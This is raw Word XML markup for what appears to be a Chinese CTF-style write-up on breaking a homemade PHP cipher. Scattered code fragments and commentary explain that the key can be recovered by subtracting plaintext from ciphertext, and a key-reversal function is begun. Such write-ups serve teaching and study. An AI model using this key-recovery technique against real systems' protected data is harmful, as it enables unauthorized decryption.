            <v:rect id="_x0000_s7976" style="position:absolute;left:185;top:5464;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7975" style="position:absolute;left:426;top:5464;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7974" style="position:absolute;left:546;top:5464;width:362;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7973" style="position:absolute;left:5;top:5727;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7972" style="position:absolute;left:185;top:5790;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7971" style="position:absolute;left:285;top:5790;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7970" style="position:absolute;left:385;top:5790;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7969" style="position:absolute;left:485;top:5790;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7968" style="position:absolute;left:585;top:5790;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7967" style="position:absolute;left:685;top:5790;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7966" style="position:absolute;left:785;top:5790;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7965" style="position:absolute;left:885;top:5790;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7964" style="position:absolute;left:985;top:5790;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7963" style="position:absolute;left:1085;top:5790;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7962" style="position:absolute;left:1185;top:5790;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7961" style="position:absolute;left:1285;top:5790;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7960" style="position:absolute;left:1385;top:5790;width:602;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7959" style="position:absolute;left:1987;top:5790;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7958" style="position:absolute;left:2108;top:5790;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7957" style="position:absolute;left:2228;top:5790;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7956" style="position:absolute;left:2349;top:5790;width:1687;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7955" style="position:absolute;left:4036;top:5790;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7954" style="position:absolute;left:4156;top:5790;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7953" style="position:absolute;left:4277;top:5790;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7952" style="position:absolute;left:4397;top:5790;width:1808;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7951" style="position:absolute;left:5;top:6053;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7950" style="position:absolute;left:185;top:6116;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7949" style="position:absolute;left:285;top:6116;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7948" style="position:absolute;left:385;top:6116;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7947" style="position:absolute;left:485;top:6116;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7946" style="position:absolute;left:585;top:6116;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7945" style="position:absolute;left:685;top:6116;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7944" style="position:absolute;left:785;top:6116;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7943" style="position:absolute;left:885;top:6116;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7942" style="position:absolute;left:985;top:6116;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7941" style="position:absolute;left:1085;top:6116;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7940" style="position:absolute;left:1185;top:6116;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7939" style="position:absolute;left:1285;top:6116;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7938" style="position:absolute;left:1385;top:6116;width:1807;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7937" style="position:absolute;left:5;top:6379;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7936" style="position:absolute;left:185;top:6442;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7935" style="position:absolute;left:285;top:6442;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7934" style="position:absolute;left:385;top:6442;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7933" style="position:absolute;left:485;top:6442;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7932" style="position:absolute;left:585;top:6442;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7931" style="position:absolute;left:685;top:6442;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7930" style="position:absolute;left:785;top:6442;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7929" style="position:absolute;left:885;top:6442;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7928" style="position:absolute;left:985;top:6442;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7927" style="position:absolute;left:5;top:6705;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s7926" type="#_x0000_t75" style="position:absolute;left:185;top:6768;width:520;height:200">
              <v:imagedata r:id="rId68" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s7925" style="position:absolute;left:5;top:7031;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s7924" type="#_x0000_t75" style="position:absolute;left:185;top:7094;width:400;height:200">
              <v:imagedata r:id="rId36" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s7923" style="position:absolute;left:585;top:7094;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7922" style="position:absolute;left:1308;top:7094;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7921" style="position:absolute;left:1428;top:7094;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7920" style="position:absolute;left:5;top:7357;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7919" style="position:absolute;left:185;top:7420;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s7918" type="#_x0000_t202" style="position:absolute;left:3;top:3;width:6750;height:7863" filled="f" strokecolor="#ccc" strokeweight=".24pt">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent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80020F">
                    <w:pPr>
                      <w:spacing w:before="1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$char;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 = base64_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encode(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$result);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 = str_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replace(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array('+', '/', '='),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array(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'-', '_', ''), $result);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} elseif ($operation == 'DECODE') {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87" w:firstLine="79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$data = str_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replace(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array('-', '_'), array('+', '/'), $string);</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:line="391" w:lineRule="auto"/>
                      <w:ind w:left="980" w:right="2616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$mod4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strlen(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$data) % 4; if ($mod4) {</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr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data 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substr('====', $mod4);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$string = base64_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decode(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$data);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strlen($string); $i++) {</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="124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$char =</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333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$string, $i, 1);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$keychar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$key,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($i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%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strlen($key))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-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1, 1);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chr(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ord($char) - ord($keychar));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$char;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$result;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8"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:spacing w:before="34" w:line="271" w:lineRule="auto"/>
        <w:ind w:right="415"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以看到密文是明文与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-57"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">key </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-54"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t>ascii</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相加最后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base64 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编码后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  <w:spacing w:val="-14"/>
        </w:rPr>
        <w:t>得到的，加密时，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:spacing w:val="-14"/>
        </w:rPr>
        <w:t xml:space="preserve">key </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>由最后一位开始，依次与明文的每一位</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>进</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-71"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">ascii </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相加，因此用密文和明文相减能得到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-70"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，有没有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>凯</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>撒加密的感</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>觉</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:ind w:left="417"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:pict>
          <v:group id="_x0000_s7884" style="position:absolute;left:0;text-align:left;margin-left:80.6pt;margin-top:16.7pt;width:341.85pt;height:83.1pt;z-index:5944;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordorigin="1612,334" coordsize="6837,1662">
            <v:rect id="_x0000_s7916" style="position:absolute;left:1617;top:339;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7915" style="position:absolute;left:1797;top:582;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7914" style="position:absolute;left:2761;top:582;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7913" style="position:absolute;left:2881;top:582;width:2531;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7912" style="position:absolute;left:5412;top:582;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7911" style="position:absolute;left:5532;top:582;width:844;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7910" style="position:absolute;left:6376;top:582;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7909" style="position:absolute;left:6496;top:582;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7908" style="position:absolute;left:1617;top:845;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s7907" type="#_x0000_t75" style="position:absolute;left:1797;top:908;width:400;height:200">
              <v:imagedata r:id="rId37" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s7906" style="position:absolute;left:2197;top:908;width:843;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7905" style="position:absolute;left:3040;top:908;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7904" style="position:absolute;left:3161;top:908;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7903" style="position:absolute;left:3281;top:908;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7902" style="position:absolute;left:3402;top:908;width:602;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7901" style="position:absolute;left:1617;top:1171;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s7900" type="#_x0000_t75" style="position:absolute;left:1797;top:1234;width:400;height:200">
              <v:imagedata r:id="rId36" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s7899" style="position:absolute;left:2197;top:1234;width:604;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s7898" style="position:absolute" from="2833,1234" to="2833,1434" strokecolor="#f8f8f8" strokeweight="3.25pt"/>
            <v:rect id="_x0000_s7897" style="position:absolute;left:2866;top:1234;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s7896" style="position:absolute" from="3019,1234" to="3019,1434" strokecolor="#f8f8f8" strokeweight="3.25pt"/>
            <v:rect id="_x0000_s7895" style="position:absolute;left:3052;top:1234;width:2662;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s7894" style="position:absolute" from="5746,1234" to="5746,1434" strokecolor="#f8f8f8" strokeweight="3.2pt"/>
            <v:rect id="_x0000_s7893" style="position:absolute;left:5778;top:1234;width:605;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s7892" style="position:absolute" from="6415,1234" to="6415,1434" strokecolor="#f8f8f8" strokeweight="3.25pt"/>
            <v:rect id="_x0000_s7891" style="position:absolute;left:6448;top:1234;width:1210;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s7890" style="position:absolute" from="7690,1234" to="7690,1434" strokecolor="#f8f8f8" strokeweight="3.25pt"/>
            <v:rect id="_x0000_s7889" style="position:absolute;left:7723;top:1234;width:604;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7888" style="position:absolute;left:8327;top:1234;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7887" style="position:absolute;left:1617;top:1497;width:6745;height:494" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7886" style="position:absolute;left:1797;top:1560;width:1205;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s7885" type="#_x0000_t202" style="position:absolute;left:1614;top:336;width:6792;height:1657" filled="f" strokecolor="#ccc" strokeweight=".24pt">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                    <w:pPr>
                      <w:spacing w:before="7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anti_eccode($encrypt, $clear) {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 = null;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$data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str_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replace(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array('-',</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333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'_'),</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333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array('+',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'/'),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$encrypt);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MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>知道原理以后下面开始逆向</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-64"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia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7720" style="width:337.75pt;height:279.3pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="6755,5586">
            <v:rect id="_x0000_s7883" style="position:absolute;left:5;top:5;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s7882" type="#_x0000_t75" style="position:absolute;left:185;top:248;width:400;height:200">
              <v:imagedata r:id="rId36" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s7881" style="position:absolute;left:585;top:248;width:602;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7880" style="position:absolute;left:1187;top:248;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7879" style="position:absolute;left:1308;top:248;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7878" style="position:absolute;left:1428;top:248;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7877" style="position:absolute;left:1549;top:248;width:1566;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7876" style="position:absolute;left:3115;top:248;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7875" style="position:absolute;left:3236;top:248;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7874" style="position:absolute;left:3356;top:248;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7873" style="position:absolute;left:3477;top:248;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7872" style="position:absolute;left:5;top:511;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7871" style="position:absolute;left:185;top:574;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7870" style="position:absolute;left:285;top:574;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7869" style="position:absolute;left:385;top:574;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7868" style="position:absolute;left:485;top:574;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7867" style="position:absolute;left:585;top:574;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7866" style="position:absolute;left:826;top:574;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7865" style="position:absolute;left:946;top:574;width:844;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7864" style="position:absolute;left:1790;top:574;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7863" style="position:absolute;left:1910;top:574;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7862" style="position:absolute;left:5;top:837;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7861" style="position:absolute;left:185;top:900;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7860" style="position:absolute;left:285;top:900;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7859" style="position:absolute;left:385;top:900;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7858" style="position:absolute;left:485;top:900;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7857" style="position:absolute;left:585;top:900;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7856" style="position:absolute;left:685;top:900;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7855" style="position:absolute;left:785;top:900;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7854" style="position:absolute;left:885;top:900;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7853" style="position:absolute;left:985;top:900;width:602;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7852" style="position:absolute;left:1587;top:900;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7851" style="position:absolute;left:1708;top:900;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7850" style="position:absolute;left:1949;top:900;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7849" style="position:absolute;left:2069;top:900;width:1687;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7848" style="position:absolute;left:3756;top:900;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7847" style="position:absolute;left:3877;top:900;width:843;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7846" style="position:absolute;left:5;top:1163;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s7845" type="#_x0000_t75" style="position:absolute;left:185;top:1226;width:520;height:200">
              <v:imagedata r:id="rId68" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s7844" style="position:absolute;left:5;top:1489;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s7843" type="#_x0000_t75" style="position:absolute;left:185;top:1552;width:400;height:200">
              <v:imagedata r:id="rId36" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s7842" style="position:absolute;left:585;top:1552;width:843;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7841" style="position:absolute;left:1428;top:1552;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7840" style="position:absolute;left:1549;top:1552;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7839" style="position:absolute;left:1669;top:1552;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7838" style="position:absolute;left:1790;top:1552;width:2530;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7837" style="position:absolute;left:5;top:1815;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7836" style="position:absolute;left:5;top:2141;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7835" style="position:absolute;left:185;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7834" style="position:absolute;left:285;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7833" style="position:absolute;left:385;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7832" style="position:absolute;left:485;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7831" style="position:absolute;left:585;top:2204;width:361;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7830" style="position:absolute;left:946;top:2204;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7829" style="position:absolute;left:1067;top:2204;width:361;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7828" style="position:absolute;left:1428;top:2204;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7827" style="position:absolute;left:1549;top:2204;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7826" style="position:absolute;left:1669;top:2204;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7825" style="position:absolute;left:1790;top:2204;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7824" style="position:absolute;left:2031;top:2204;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7823" style="position:absolute;left:2151;top:2204;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
